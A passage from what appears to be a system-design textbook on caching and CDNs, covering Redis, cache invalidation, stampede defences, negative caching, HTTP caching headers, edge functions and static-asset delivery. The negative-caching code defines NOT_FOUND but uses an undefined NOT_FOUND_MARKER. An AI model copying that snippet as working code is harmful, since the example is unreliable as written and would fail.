- Redis's structures (hashes, sorted sets, counters, HyperLogLog) remove round trips and races.
- Redis executes commands single-threaded — one O(n) command stalls every client. Never mix cache and store in one instance.
🧪 Practice
- Rewrite "read a user object, increment its login count, write it back" using a Redis hash and one atomic command.
- Explain why
KEYS *on a production Redis with 10 million keys causes an outage, and what to use instead.- Interview: When would you choose Memcached over Redis in 2026? (Hint: think about what you gain by having fewer features, and at what scale that starts to matter.)
Cache Sharding and Replication
One cache node has a memory ceiling and is a single point of failure. Scaling past it means the same two mechanisms as any data system: sharding to distribute keys across nodes, and replication to keep copies for availability. What differs is that a cache is derived data, which changes the calculus considerably — losing a shard is a performance event, not a data-loss event.
Sharding a cache uses consistent hashing (Chapter 4.5) for the reason established
there: plain hash % N remaps almost every key when the cluster changes, and
for a cache that means a near-total cold start precisely when you are adding
capacity because you are under load.
REDIS CLUSTER: 16384 HASH SLOTS
CRC16(key) mod 16384 -> slot -> node
node A: slots 0 - 5460 node B: slots 5461 - 10922
node C: slots 10923 - 16383
Adding node D: move whole SLOTS (not a rehash) to D. Only the migrated
slots' keys are affected; everything else keeps serving.
HASH TAGS: forcing related keys onto one node
user:7:profile and user:7:settings -> may land on different nodes
user:{7}:profile and user:{7}:settings -> only "7" is hashed, so BOTH land
on the same node
Required for multi-key operations (MGET, transactions, Lua) in Cluster mode.
# Replication for a cache is about AVAILABILITY, not durability.
# Redis Cluster: each shard has one primary and one or more replicas.
#
# client writes -> primary (asynchronous replication to replica)
# primary dies -> replica is promoted; some very recent writes may be lost
#
# For a cache, losing the last few writes is fine: the next read is a miss and
# repopulates from the origin. That is exactly why cache replication can be
# asynchronous where a database's often cannot.
def get_with_failover(key, cluster, db):
try:
if (v := cluster.get(key)) is not None:
return v
except (ConnectionError, ClusterDownError):
# NEVER let a cache outage become an application outage. Degrade to the
# origin, and shed load if the origin cannot take the full traffic.
metrics.increment("cache.unavailable")
return db.query(key)
v = db.query(key)
try:
cluster.setex(key, 300, v)
except Exception:
pass # a failed cache write is not a failed request
return v
| Concern | Cache | Database |
|---|---|---|
| Losing a node | Hit ratio drops; origin load spikes | Data loss or unavailability |
| Replication mode | Asynchronous is fine | Often must be synchronous |
| Rebalancing | Can simply cold-start the new node | Must move all data correctly |
| Consistency across replicas | Tolerable | Critical |
| The real risk | Origin cannot absorb the miss traffic | Data integrity |
That final row is the one that causes outages. A cache node holding 25% of a 10,000 RPS workload at a 95% hit ratio is absorbing roughly 2,375 RPS. If it dies and those keys all miss, the origin's load jumps by that amount instantly. Capacity-plan the origin for partial cache loss, not just for the steady state — and consider whether your system needs to shed load rather than melt.
Two sharding refinements are worth knowing. Replicating hot keys across several shards (with a random read replica chosen per request) fixes the single-hot-key problem that sharding alone cannot. And client-side consistent-hashing libraries (the Memcached approach) avoid running a cluster manager at the cost of every client needing the same node list.
Key Takeaways
- Shard a cache with consistent hashing so adding capacity does not cold-start everything.
- Redis Cluster moves whole hash slots; hash tags
{...}co-locate related keys for multi-key operations.- Cache replication buys availability, not durability — asynchronous is acceptable.
- Plan origin capacity for partial cache loss, and never let a cache outage fail requests.
🧪 Practice
- Compute the origin RPS spike when one of four cache nodes fails at 40,000 RPS and a 96% hit ratio.
- Explain why
MGET user:7:profile user:7:settingsfails in Redis Cluster and how hash tags fix it.- Interview: Your cache cluster is healthy but one node's CPU is at 100%. What is likely wrong? (Hint: sharding distributes keys evenly, which is not the same as distributing requests evenly.)
Cache Invalidation Techniques
The old joke is that there are only two hard problems in computer science: cache invalidation and naming things. The reason invalidation is genuinely hard is that a cache entry has no way to know the underlying data changed — something must tell it, and that something has to know every key derived from every piece of data.
There are three families of answer, and mature systems use all three at once.
1. TTL (EXPIRY) simplest; staleness is bounded but guaranteed
set key with ttl=300 "wrong for at most 5 minutes"
no coordination needed works even when invalidation messages are lost
2. EXPLICIT INVALIDATION precise; requires knowing every derived key
on write -> delete key(s) fails silently when someone forgets a path
or when data changes outside your code
3. VERSIONED / KEY MUTATION never invalidate; change the key instead
key = f"product:{id}:v{ver}" old entries age out naturally
bump ver on write no delete storm, no race — but memory churn
# TECHNIQUE: key versioning by namespace. One counter invalidates a whole
# family of derived keys without enumerating or deleting any of them.
def product_list_key(tenant_id, filters, redis):
version = redis.get(f"ver:products:{tenant_id}") or 0
return f"products:{tenant_id}:v{version}:{hash_filters(filters)}"
def on_product_changed(tenant_id, redis):
redis.incr(f"ver:products:{tenant_id}") # every derived key is now unreachable
# No scanning, no delete storm, no missed key. The old entries simply
# become garbage and are evicted by TTL/LRU in their own time.
# TECHNIQUE: tag-based invalidation, when you need precision.
def cache_with_tags(key, value, tags, redis, ttl=300):
pipe = redis.pipeline()
pipe.setex(key, ttl, value)
for tag in tags: # e.g. ["product:42", "category:9"]
pipe.sadd(f"tag:{tag}", key) # reverse index: tag -> keys
pipe.expire(f"tag:{tag}", ttl * 2)
pipe.execute()
def invalidate_tag(tag, redis):
keys = redis.smembers(f"tag:{tag}")
if keys:
redis.delete(*keys, f"tag:{tag}") # every page mentioning product 42
FAN-OUT INVALIDATION ACROSS INSTANCES
One instance writes; every instance's LOCAL (L1) cache must be told.
[instance 1] --write--> [database]
|
+-- publish "invalidate:product:42" --> [Redis pub/sub or a topic]
|
+------------------+-----------+------------+
v v v
[instance 1] [instance 2] ... [instance 20]
drop local key drop local key drop local key
Pub/sub is fire-and-forget: an instance that was restarting misses the
message and keeps a stale entry until its TTL. This is precisely why L1
TTLs must be short even with explicit invalidation.
| Technique | Precision | Cost | Fails when |
|---|---|---|---|
| TTL only | None | Zero | Staleness window is unacceptable |
| Explicit delete | Exact | Must know every key | A write path forgets to invalidate |
| Key versioning | Namespace | Memory churn from orphans | You need per-key precision |
| Tag-based | Exact | A reverse index to maintain | Tag sets grow unbounded |
| Pub/sub fan-out | Exact | Best-effort delivery | An instance misses the message |
| CDC-driven (4.6) | Exact | A pipeline to operate | Nothing forgets — it reads the log |
The most robust design combines them: CDC or explicit invalidation for precision, key versioning for whole namespaces, and a TTL underneath everything as the backstop. The TTL is what saves you when the precise mechanism fails, and it will fail — someone will write to the database from a migration script, an admin tool, or another service that never publishes an invalidation.
Key Takeaways
- A cache cannot know data changed; something must tell it, and that path can always be missed.
- TTL bounds staleness with zero coordination — always have one as a backstop.
- Key versioning invalidates an entire namespace with one counter increment and no deletes.
- Local per-instance caches need short TTLs even with pub/sub fan-out, because delivery is best-effort.
🧪 Practice
- Design invalidation for a product page cached under several keys (product, category listing, search results, sitemap).
- Implement namespace versioning and explain what happens to the orphaned old entries.
- Interview: A nightly batch job updates prices directly in the database and users see old prices all morning. What went wrong and what are the fixes? (Hint: the application's invalidation code is correct — and irrelevant.)
Cache Stampede and Thundering Herd
A cache is most valuable for exactly the keys that are requested most, which means the moment a hot key expires, every concurrent request for it misses at once. All of them go to the origin, all of them compute the same value, and the origin — sized for the cached traffic rate — collapses. This is a cache stampede (or thundering herd), and it is the most common way a caching layer causes an outage rather than preventing one.
The arithmetic is brutal. A key served 5,000 times per second with a 60-second TTL protects the origin from 300,000 requests per minute. When it expires, if a miss takes 200 ms, roughly 1,000 requests arrive before the first one finishes — and every one of them is a database query.
THE STAMPEDE
t=0.000 key expires
t=0.001 req 1 misses -> starts a 200 ms origin query
t=0.002 req 2 misses -> starts an IDENTICAL query
...
t=0.200 req 1000 misses -> 1000 concurrent identical queries
t=0.200 req 1 finishes and populates the cache
...the other 999 queries are still running, doing nothing useful
Worse: the origin is now slow, so misses take 2 s instead of 200 ms, so
10,000 requests pile up instead of 1,000. The system does not recover on
its own.
# DEFENCE 1: request coalescing (single-flight). Only one caller loads; the
# rest wait for its result. This is the single most effective fix.
def get_coalesced(key, cache, loader, ttl=300):
if (v := cache.get(key)) is not None:
return v
lock_key = f"lock:{key}"
if cache.set(lock_key, "1", nx=True, ex=10): # atomic: exactly one winner
try:
v = loader(key) # the ONLY origin call
cache.setex(key, ttl, v)
return v
finally:
cache.delete(lock_key)
# Lost the race: wait briefly for the winner rather than hitting the origin.
for _ in range(50):
time.sleep(0.02)
if (v := cache.get(key)) is not None:
return v
return loader(key) # last resort after ~1 s: better slow than wrong
# DEFENCE 2: probabilistic early expiration. Each request independently decides
# whether to refresh early, so refreshes spread out instead of synchronizing.
def should_refresh_early(entry, ttl, beta=1.0):
# XFetch: probability rises as expiry approaches, scaled by how long the
# recompute takes — expensive values start refreshing sooner.
gap = entry.recompute_seconds * beta * math.log(random.random())
return time.time() - gap >= entry.expires_at
# DEFENCE 3: jittered TTLs, so keys populated together do not expire together.
cache.setex(key, 300 + random.randint(-30, 30), value)
Three related herd problems have the same shape and different triggers:
| Variant | Trigger | Fix |
|---|---|---|
| Stampede (one key) | A hot key expires | Coalescing, early refresh, jitter |
| Synchronized expiry | Many keys populated together expire together | TTL jitter |
| Cold start | Cache restart or deploy empties it | Warm-up on boot; gradual traffic ramp |
| Cache failure | The cache cluster goes down | Origin capacity headroom, load shedding, circuit breakers |
The last two are why the origin must never be sized assuming the cache is always there. Either provision enough origin capacity for a plausible cache loss, or install a circuit breaker (Chapter 9.2) that sheds load and serves degraded responses rather than letting the database die and take everything with it.
Key Takeaways
- When a hot key expires, every concurrent request misses simultaneously and hits the origin.
- Request coalescing — one loader, everyone else waits — is the most effective defence.
- Jitter TTLs so keys populated together do not expire together.
- Never size the origin assuming the cache is up; plan for cold starts and cache outages explicitly.
🧪 Practice
- Compute the number of concurrent origin queries for a key at 3,000 RPS with a 150 ms miss, without coalescing.
- Implement single-flight coalescing and prove one origin call under 200 concurrent misses.
- Interview: Your cache cluster restarts and the database immediately falls over. Describe both the immediate response and the permanent fix. (Hint: the permanent fix is not "make the cache more reliable".)
Negative Caching
Caches usually store answers. But "there is no answer" is also an answer, and failing to cache it creates a specific vulnerability: every request for a key that does not exist bypasses the cache entirely and hits the origin. Under normal traffic that is a minor inefficiency. Under a malicious or buggy client enumerating random ids, it is a cache penetration attack that turns your cache into a pass-through and your database into the bottleneck.
Negative caching stores the absence of a value — a "not found" marker — so repeated lookups for a missing key are answered from the cache like any other.
WITHOUT NEGATIVE CACHING WITH NEGATIVE CACHING
GET /users/999999 GET /users/999999
cache miss cache miss
db query -> not found db query -> not found
return 404 cache.setex(key, 60, NOT_FOUND)
(nothing cached) return 404
Attacker requests 100,000 Second request onward is served from
random ids -> 100,000 database the cache. The origin sees each missing
queries. The cache is useless. id at most once per 60 seconds.
NOT_FOUND = object() # a distinct sentinel; NOT None, NOT empty string
def get_user(user_id, cache, db):
key = f"user:{user_id}"
cached = cache.get(key)
if cached is NOT_FOUND_MARKER: # negative hit
return None
if cached is not None: # positive hit
return cached
user = db.query_user(user_id)
if user is None:
# Short TTL: a negative entry must not outlive the creation of the
# real record by long. 30-60 s is typical; positive entries live longer.
cache.setex(key, 60, NOT_FOUND_MARKER)
return None
cache.setex(key, 300, user)
return user
def create_user(user_id, data, cache, db):
db.insert_user(user_id, data)
cache.delete(f"user:{user_id}") # CRITICAL: clear any negative entry,
# or the new user "does not exist"
# for up to 60 seconds
For very large keyspaces, a Bloom filter is a cheaper defence: a compact probabilistic structure that answers "definitely not present" or "possibly present" without storing the keys.
# A Bloom filter of all valid ids sits in front of the cache. It can produce
# false positives (says "maybe" for a missing key) but never false negatives,
# so a "no" is always trustworthy.
def get_user_bloom(user_id, bloom, cache, db):
if not bloom.might_contain(user_id):
return None # definitely does not exist: zero I/O
return get_user(user_id, cache, db)
# ~1.2 MB holds 1 million ids at a 1% false-positive rate — far less than
# caching a million negative entries.
# The catch: deletions are awkward (standard Bloom filters cannot remove), so
# the filter is usually rebuilt periodically.
| Aspect | Guidance |
|---|---|
| Negative TTL | Much shorter than positive TTL (30-60 s typical) |
| Marker value | A distinct sentinel — never None, which is indistinguishable from a miss |
| On creation | Delete the negative entry, or the new record appears missing |
| Memory risk | Enumeration attacks fill the cache with negatives — cap it or use a Bloom filter |
| Large keyspaces | Bloom filter in front; rebuild it periodically |
| Rate limiting | Complementary: limit lookups of non-existent ids per client |
Key Takeaways
- Uncached "not found" results let missing-key traffic bypass the cache entirely.
- Store a distinct sentinel for absence, never
None— the two must be distinguishable.- Give negative entries a much shorter TTL, and delete them when the record is created.
- For huge keyspaces, a Bloom filter rejects missing keys with far less memory.
🧪 Practice
- Add negative caching to a lookup, including the sentinel and the invalidation on creation.
- Explain the bug that appears if a negative entry has the same TTL as a positive one, from a user's point of view.
- Interview: An attacker requests millions of random product ids and your database is overwhelmed. Give three layered defences. (Hint: one caches, one filters, one throttles.)
Cache Consistency Trade-offs
Every cache is a copy, and every copy can disagree with the original. There is no configuration that removes this — you can only choose how the cache is allowed to be wrong, for how long, and what that costs. Being explicit about that choice per data type is what separates a caching design from a caching accident.
The question to ask about any cached value is: what is the worst thing that happens if a user sees a value that is N seconds old? The answer sets the TTL, the invalidation strategy, and sometimes the decision not to cache at all.
THE STALENESS TOLERANCE SCALE
0 s account balance during a transfer -> do not cache
inventory count at checkout -> do not cache, or lock
1-5 s permissions and feature flags -> short TTL + pub/sub
30 s a user's own dashboard -> TTL, keyed per user
5 min product catalogue, prices -> TTL + explicit invalidation
1 hour public article content -> CDN, long TTL, purge on edit
1 year hashed static assets -> immutable, never invalidated
The scale is a business question, not a technical one. "How stale is too
stale?" is answered by the domain, not by the cache.
# Make the trade-off a declared property of the data, not an ad-hoc choice at
# each call site. This is the single most useful discipline in caching.
CACHE_POLICY = {
"account_balance": {"cacheable": False,
"reason": "financial correctness; must be authoritative"},
"permissions": {"ttl": 5, "invalidate": "pubsub",
"reason": "stale permissions are a security issue"},
"user_dashboard": {"ttl": 30, "invalidate": None},
"product": {"ttl": 300, "invalidate": "explicit"},
"article_html": {"ttl": 3600, "invalidate": "cdn_purge"},
"static_asset": {"ttl": 31_536_000, "invalidate": "url_versioning"},
}
# Reviewable, testable, and greppable. When someone asks "why is this stale for
# five minutes?", the answer is written down.
Two specific hazards deserve naming because they are the ones that cause incidents rather than annoyance:
| Hazard | Why it is worse than ordinary staleness |
|---|---|
| Cached authorization | A revoked user keeps access for the TTL — a security hole, not a UX issue |
| Cached negative permission | A newly-granted user is locked out; support tickets |
| Cached aggregates over cached data | Staleness compounds: a 5-minute cache built from 5-minute caches can be 10 minutes stale |
| Per-instance L1 disagreement | Two refreshes return different answers; users think the app is broken |
For the compounding case, the rule is to build derived caches from the origin, not from other caches, or to accept and document the summed staleness.
Finally, the honest framing for the whole chapter: caching trades correctness for performance. Everything in Chapter 4 was about making data correct; caching deliberately relaxes that in exchange for speed and capacity. That is a good trade for most data and a terrible one for some, and knowing which is which is the actual skill.
Key Takeaways
- You cannot eliminate cache inconsistency — only choose its shape, duration, and cost.
- Ask "what breaks if this is N seconds old?" and let the domain set the TTL.
- Declare cache policy per data type in one place rather than deciding at each call site.
- Cached authorization is a security decision; staleness compounds when caches are layered on caches.
🧪 Practice
- Write a cache policy table for a banking app covering balances, transaction history, exchange rates, and branch locations.
- Explain the security consequence of a 15-minute permissions cache when an employee is terminated, and design the fix.
- Interview: A stakeholder asks for "caching, but always fresh". How do you respond? (Hint: reframe the request as a measurable tolerance, then price each level.)
<a id="54-content-delivery-networks"></a>
5.4 Content Delivery Networks
A CDN is a cache you rent, distributed across the planet; this subchapter covers its architecture, how content gets into it, the HTTP headers that control it, and what it can do beyond caching bytes.
CDN Architecture and PoPs
Chapter 2.4 introduced edge networks as a latency tool. This topic looks inside one, because the internal structure explains behaviour that otherwise seems arbitrary — why a "purge" is not instant, why hit ratios differ per region, and why a CDN can serve a terabit while your origin serves a gigabit.
A CDN is a hierarchy. Points of presence (PoPs) — hundreds of them — sit in internet exchange facilities near population centres. Each holds edge servers with a local cache. Behind them, a smaller number of shield or mid-tier caches aggregate misses from many PoPs, so the origin sees one request rather than one per PoP.
CDN TOPOLOGY
[users in Sydney] [users in Tokyo] [users in Berlin]
| | |
[PoP SYD] [PoP NRT] [PoP BER] ~300 PoPs
cache cache cache
\ | /
\ | /
+------------ [ SHIELD / mid-tier cache ] + ~10-30 shields
|
v
[ ORIGIN ] 1 (or a few)
WITHOUT a shield: a cold object is fetched from origin once PER PoP.
300 PoPs -> 300 origin requests for the same object.
WITH a shield: the shield fetches once; every PoP fetches from the shield.
Origin requests: 1. This is "origin shielding" and it is
the difference between a 95% and a 99.7% origin offload.
Three mechanisms make the whole thing work, and each has an operational consequence:
| Mechanism | What it does | Consequence you will notice |
|---|---|---|
| Anycast routing | One IP announced from every PoP; BGP routes users to the nearest | You cannot choose a PoP; routing follows network topology, not geography |
| Tiered caching | Shields absorb PoP misses | Origin offload jumps dramatically |
| Per-PoP independence | Each PoP caches separately | Hit ratio is per-PoP; a rarely-visited region has a cold cache |
That last row explains a common confusion. A global 95% hit ratio can hide a PoP in a low-traffic region running at 40%, because objects there expire before enough requests arrive to justify holding them. It is also why purging is not instantaneous: the purge must reach every PoP, which typically takes seconds and is best-effort.
# What a CDN edge does per request, conceptually.
def edge_handle(request, cache, shield):
key = cache_key(request) # usually: host + path + query + Vary headers
entry = cache.get(key)
if entry and entry.fresh:
return entry.response # HIT: ~5-15 ms for the user
if entry and entry.stale_while_revalidate_ok:
background_revalidate(key, shield)
return entry.response # stale but instant (5.2)
# MISS: go to the shield, not the origin. Collapse concurrent misses for the
# same key into ONE upstream request ("request collapsing") — the CDN's
# built-in defence against the stampede from 5.3.
with cache.collapse(key):
response = shield.fetch(request)
if is_cacheable(response): # driven by Cache-Control
cache.store(key, response, ttl=compute_ttl(response))
return response
The cache key deserves attention because it decides your hit ratio more than
any other setting. By default it includes host, path, and query string — which
means a tracking parameter like ?utm_source=twitter creates a separate cache
entry for every campaign, fragmenting what should be one object. Normalizing the
cache key (stripping irrelevant query parameters, ignoring cookies, limiting
Vary) is usually the highest-value CDN tuning available.
Key Takeaways
- A CDN is tiered: many PoPs, fewer shields, one origin; shielding is what produces very high origin offload.
- Anycast routes users to the topologically nearest PoP — you do not control which one.
- Each PoP caches independently, so hit ratios vary by region and purges take seconds to propagate.
- Cache-key normalization (query parameters, cookies,
Vary) is the biggest lever on CDN hit ratio.
🧪 Practice
- Compute origin requests for one cold object across 200 PoPs, with and without a shield tier.
- Explain why appending
?utm_source=...to shared links can collapse your CDN hit ratio, and how to fix it.- Interview: Your CDN reports a 94% hit ratio but origin traffic is still high. What do you investigate? (Hint: a global average hides both regional variation and key fragmentation.)
Push vs. Pull CDNs
Content has to get into the CDN somehow, and there are two models. In a pull CDN, you change nothing: the CDN fetches from your origin on the first request for each object and caches the result. In a push CDN, you upload content to the CDN in advance, and the CDN serves it without ever contacting an origin.
Pull is the overwhelming default because it requires no publishing pipeline and automatically adapts to what people actually request. Push exists for cases where the first-request penalty is unacceptable or where there is no origin to pull from.
PULL (origin-fetch) PUSH (pre-populated)
first request -> MISS you upload -> [CDN storage]
CDN -> origin -> CDN every request -> HIT, always
user waits for the full
origin round trip No origin needed at request time.
later requests -> HIT You must publish, version, and expire
content yourself.
Origin must stay available. Storage cost for everything, whether
Cold objects are always slow once. requested or not.
# PULL: nothing to do but set headers correctly. The CDN discovers content.
# origin serves /images/product-42.jpg with Cache-Control: public, max-age=86400
# first user in Tokyo pays the origin fetch; the next 10,000 do not
# PUSH: an explicit publishing step, usually in CI/CD.
def publish_release(build_dir, cdn):
for path in walk(build_dir):
# Content-hashed names mean a push never overwrites — it only adds.
# Old versions stay available for users still running the old client.
cdn.upload(
key=f"static/{content_hash(path)}/{basename(path)}",
body=read(path),
cache_control="public, max-age=31536000, immutable",
content_encoding="br", # pre-compressed at build time
)
cdn.upload(key="manifest.json", body=build_manifest(),
cache_control="public, max-age=60") # the only mutable object
| Dimension | Pull CDN | Push CDN |
|---|---|---|
| Setup | Point a DNS record; done | Build a publishing pipeline |
| First request | Slow (origin fetch) | Fast (already there) |
| Origin dependency | Required and must stay up | None at request time |
| Storage cost | Only what is requested | Everything you upload |
| Content updates | Automatic on TTL expiry | Explicit re-publish |
| Best for | Websites, APIs, most assets | Large media, software releases, launch-day spikes |
| Stale content risk | Bounded by TTL | Until you push a correction |
The practical pattern most teams end up with is pull for everything, plus pre-warming for known events. Pre-warming is push-like behaviour on a pull CDN: before a product launch or a major release, you issue requests for the objects you know will be hot so they are already cached when real traffic arrives.
# Pre-warming: make the CDN fetch the objects before your users do.
# Requests must reach many PoPs to be useful — this is why CDNs offer a
# prefetch API rather than expecting you to curl from one machine.
curl -X POST https://api.cdn.example/v1/prefetch \
-d '{"urls": ["https://cdn.example.com/launch/hero.mp4"], "regions": "all"}'
Key Takeaways
- Pull CDNs fetch on first request and need no publishing pipeline — the default choice.
- Push CDNs pre-populate content, removing the first-request penalty and the origin dependency.
- Push suits large media and software distribution; pull suits websites and APIs.
- Pre-warming gives pull CDNs push-like behaviour for predictable traffic spikes.
🧪 Practice
- Decide push or pull for: a marketing site's images, a 4 GB game patch, an API's JSON responses, a video-on-demand library.
- Design the publishing step for a push CDN with content-hashed filenames and explain what happens to old versions.
- Interview: A product launch at 09:00 will drive 50x normal traffic to one page. What do you do beforehand? (Hint: the goal is that the first real user is not the one who populates the cache.)
Cache-Control and ETags
Everything a CDN, proxy, or browser does with your content is driven by response headers. Getting them right is the difference between a 99% offload and an origin that receives every request — and unlike most performance work, it costs nothing but attention.
There are two independent mechanisms. Freshness (Cache-Control) says how
long a copy may be used without asking. Validation (ETag, Last-Modified)
lets a cache ask cheaply whether its copy is still good, receiving a tiny 304
instead of the whole body.
### FRESHNESS: the directives that matter, and who they speak to
Cache-Control: public, max-age=60, s-maxage=3600, stale-while-revalidate=86400, stale-if-error=604800
# | | | | |
# | | | | +- serve stale for
# | | | | 7 days if the origin
# | | | | is DOWN (free uptime)
# | | | +- serve stale instantly and refresh behind it
# | | +- SHARED caches (CDN): 1 hour
# | +- everyone else (browser): 60 seconds
# +- may be stored by shared caches (never use with private data)
### VALIDATION: a cheap freshness check when max-age has elapsed
HTTP/1.1 200 OK
ETag: "v7-9f2c"
Last-Modified: Wed, 11 Mar 2026 10:04:22 GMT
GET /api/products
If-None-Match: "v7-9f2c"
HTTP/1.1 304 Not Modified # no body: a few hundred bytes instead of 200 KB
ETag: "v7-9f2c"
# Generating a correct ETag. Two variants with different guarantees.
def strong_etag(body_bytes):
# Strong: byte-for-byte identity. Required for range requests and for
# If-Match optimistic concurrency (Chapter 3.2).
return '"' + hashlib.sha256(body_bytes).hexdigest()[:16] + '"'
def weak_etag(resource):
# Weak: semantically equivalent, not byte-identical. Cheaper — no need to
# render the body to compute it.
return f'W/"{resource.id}-{int(resource.updated_at.timestamp())}"'
def handle(request, resource):
etag = weak_etag(resource)
if request.headers.get("If-None-Match") == etag:
return Response(304, headers={"ETag": etag}) # body never rendered
body = render(resource) # only on a real miss
return Response(200, body, headers={
"ETag": etag,
"Cache-Control": "public, max-age=60, s-maxage=600",
})
| Directive | Effect |
|---|---|
public / private | May / may not be stored by shared caches |
max-age=N | Fresh for N seconds (all caches) |
s-maxage=N | Overrides max-age for shared caches only |
no-cache | Store it, but revalidate before every use (not "do not cache") |
no-store | Never write it to any cache — the actual "do not cache" |
must-revalidate | Once stale, never serve without revalidating |
immutable | Never revalidate during max-age, even on a reload |
stale-while-revalidate=N | Serve stale for N seconds while refreshing in background |
stale-if-error=N | Serve stale for N seconds when the origin errors |
Two directives are worth singling out. stale-if-error gives you free
availability: when the origin is down, the CDN keeps serving the last good copy
instead of an error page — one header that turns an outage into a degraded but
working site. And no-cache is the most misread directive in HTTP: it means
"revalidate before use", not "do not store". The directive people usually intend
is no-store.
Finally, Vary multiplies your cache entries. Vary: Accept-Encoding is
necessary and cheap (two or three variants). Vary: User-Agent creates a
separate entry per browser string — effectively disabling the cache. Vary: Cookie on a site that sets any cookie does the same.
Key Takeaways
Cache-Controlsets freshness;ETag/Last-Modifiedenable cheap304revalidation.s-maxagetargets shared caches separately from browsers — use it to cache longer at the CDN than at the client.no-cachemeans revalidate;no-storemeans never store.stale-if-errorkeeps the site up during an origin outage; a carelessVarydestroys the hit ratio.
🧪 Practice
- Write
Cache-Controlfor: a hashed JS bundle, a news homepage, a logged-in dashboard, a one-time password endpoint.- Implement conditional responses with weak ETags and measure the bytes saved on revalidation.
- Interview: Explain the difference between
no-cacheandno-store, and give a case where using the wrong one is a security problem. (Hint: think about what is written to a shared disk on a shared computer.)
Edge Computing and Edge Functions
A CDN that only caches can serve one thing: what the origin already produced. Anything personalized, authenticated, or dynamic falls through to the origin and pays the full round trip. Edge computing removes that limit by running your code at the PoP — so decisions that need logic but not your database can be made 10 ms from the user instead of 150 ms away.
The constraint that shapes everything about edge functions is that they run in hundreds of locations. They must start in single-digit milliseconds, use little memory, and cannot assume a database connection — so they run in lightweight isolates (typically V8 or WebAssembly) rather than containers, with short CPU budgets and no persistent local state.
WHAT MOVES TO THE EDGE, AND WHAT CANNOT
GOOD AT THE EDGE STAYS AT THE ORIGIN
----------------------------------------------------------------
redirects and rewrites anything needing your database
A/B bucket assignment complex business logic
auth token validation (signature) transactions and writes
geo/device-based routing large computations
header manipulation anything needing shared state
request/response transformation long-running work
bot filtering, rate limiting
serving personalized fragments
from cached pieces
// An edge function doing four things that would each cost a 150 ms origin trip.
export default async function handler(request) {
const url = new URL(request.url);
const country = request.headers.get("cf-ipcountry") ?? "US"; // set by the PoP
// 1. Geo redirect at the edge: ~10 ms instead of a full origin round trip.
if (country === "DE" && !url.pathname.startsWith("/de/")) {
return Response.redirect(new URL("/de" + url.pathname, url), 302);
}
// 2. Validate a signed token WITHOUT calling the auth service. Signature
// verification needs only the public key — no network, no database.
const token = request.headers.get("authorization")?.slice(7);
const claims = token && (await verifyJwt(token, PUBLIC_KEY));
if (!claims) return new Response("Unauthorized", { status: 401 });
// 3. A/B assignment at the edge keeps the cached page identical per bucket,
// so both variants stay cacheable — personalization without cache loss.
const bucket = (hashString(claims.sub) % 100) < 50 ? "a" : "b";
// 4. Fetch the CACHED shell and inject the per-user fragment. The expensive
// part is cached globally; only the small personal piece is dynamic.
const shell = await fetch(new URL(`/shell/${bucket}`, url), {
cf: { cacheEverything: true, cacheTtl: 3600 },
});
return new HTMLRewriter()
.on("#greeting", { element: (e) => e.setInnerContent(`Hi ${claims.name}`) })
.transform(shell);
}
| Property | Edge function | Origin server |
|---|---|---|
| Latency to user | ~5-20 ms | ~50-250 ms |
| Cold start | Sub-millisecond (isolates) | Hundreds of ms (containers) |
| CPU/memory budget | Tight (tens of ms, ~128 MB) | Whatever you provision |
| Database access | None, or high-latency | Local and fast |
| State | Stateless, or eventually-consistent edge KV | Full |
| Runtime | JavaScript/WASM subset | Anything |
The pattern that gets the most value is caching the expensive part and computing only the cheap personal part at the edge: a globally cached page shell plus a small edge-rendered fragment. That preserves a high hit ratio while still delivering personalized content, which is otherwise the fundamental trade-off of CDN caching.
Key Takeaways
- Edge functions run your code at the PoP, so logic that needs no database avoids the origin round trip entirely.
- They run in isolates with tight CPU, memory, and runtime limits and no local state.
- Ideal work: redirects, signature validation, routing, A/B assignment, header and HTML transformation.
- Cache the expensive shell globally and compute only the small personal piece at the edge.
🧪 Practice
- Write an edge function that redirects mobile users to a lightweight page and explain why it beats an origin redirect.
- Explain why JWT signature validation works at the edge but a token revocation check generally does not.
- Interview: How would you serve a personalized homepage without destroying your CDN hit ratio? (Hint: split the response into a part that is the same for everyone and a part that is not.)
Static Asset Optimization
Static assets — JavaScript, CSS, fonts, images — are usually the majority of the bytes a page transfers and the majority of the time before it becomes usable. They are also the easiest thing in the entire chapter to optimize, because they never change once built, which means they can be cached forever and never invalidated.
The technique that makes that possible is content hashing: name each file
after a hash of its contents. app.js becomes app.a3f9c2.js. Because the name
changes whenever the content does, the old URL never needs invalidating — you
simply stop referencing it.
THE VERSIONED-URL PATTERN
BAD GOOD
/static/app.js /static/app.a3f9c2.js
Cache-Control: max-age=300 Cache-Control: max-age=31536000, immutable
Must be revalidated every 5 min Never revalidated. Ever.
Deploy -> stale for up to 5 min Deploy -> new filename -> instant pickup
Cannot cache aggressively Perfect cache hit ratio
Old versions remain valid for users
still running the old page
Only the HTML that REFERENCES the assets is short-lived:
/index.html Cache-Control: no-cache (revalidate every time; it is tiny)
// The build emits hashed names and a manifest; the server injects them.
// build output:
// dist/app.a3f9c2.js dist/vendor.7b1e04.js dist/main.9c2d81.css
// dist/manifest.json -> {"app.js": "app.a3f9c2.js", ...}
// Splitting matters as much as hashing: vendor code changes rarely, app code
// changes every deploy. Separate bundles mean a deploy invalidates only the
// small app bundle, not the 400 KB of dependencies.
# Serving the two classes correctly.
location ~* \.[0-9a-f]{6,}\.(js|css|woff2)$ { # hashed filenames
add_header Cache-Control "public, max-age=31536000, immutable";
gzip_static on; # serve pre-built .gz
brotli_static on; # and pre-built .br (smaller)
}
location = /index.html {
add_header Cache-Control "no-cache"; # revalidate; it points at the hashes
}
| Technique | Typical saving | Notes |
|---|---|---|
| Brotli compression | 15-25% smaller than gzip | Pre-compress at build time, not per request |
| Content hashing | Enables 1-year caching | The single highest-value change |
| Bundle splitting | Only changed code re-downloads | Split vendor from application |
| Modern image formats | WebP ~30%, AVIF ~50% vs JPEG | Serve via <picture> or CDN negotiation |
| Responsive images | Large — no 4K image on a phone | srcset with width descriptors |
font-display: swap | Removes invisible-text delay | Text renders before the font loads |
| Preload / Early Hints | Removes discovery round trips | 103 Early Hints for critical assets |
| Tree shaking / minification | 30-70% of JavaScript | Build-time, no runtime cost |
Two rules of thumb worth internalizing. Compress at build time, not per request — Brotli at maximum quality is far too slow to run per request but essentially free when done once during the build. And the fastest asset is the one you do not send: auditing for unused dependencies and unshipped polyfills usually beats any compression setting.
Key Takeaways
- Content-hashed filenames let you cache assets for a year and never invalidate them.
- Keep the referencing HTML short-lived; it is small and it points at the hashes.
- Split bundles so a deploy invalidates only the code that changed.
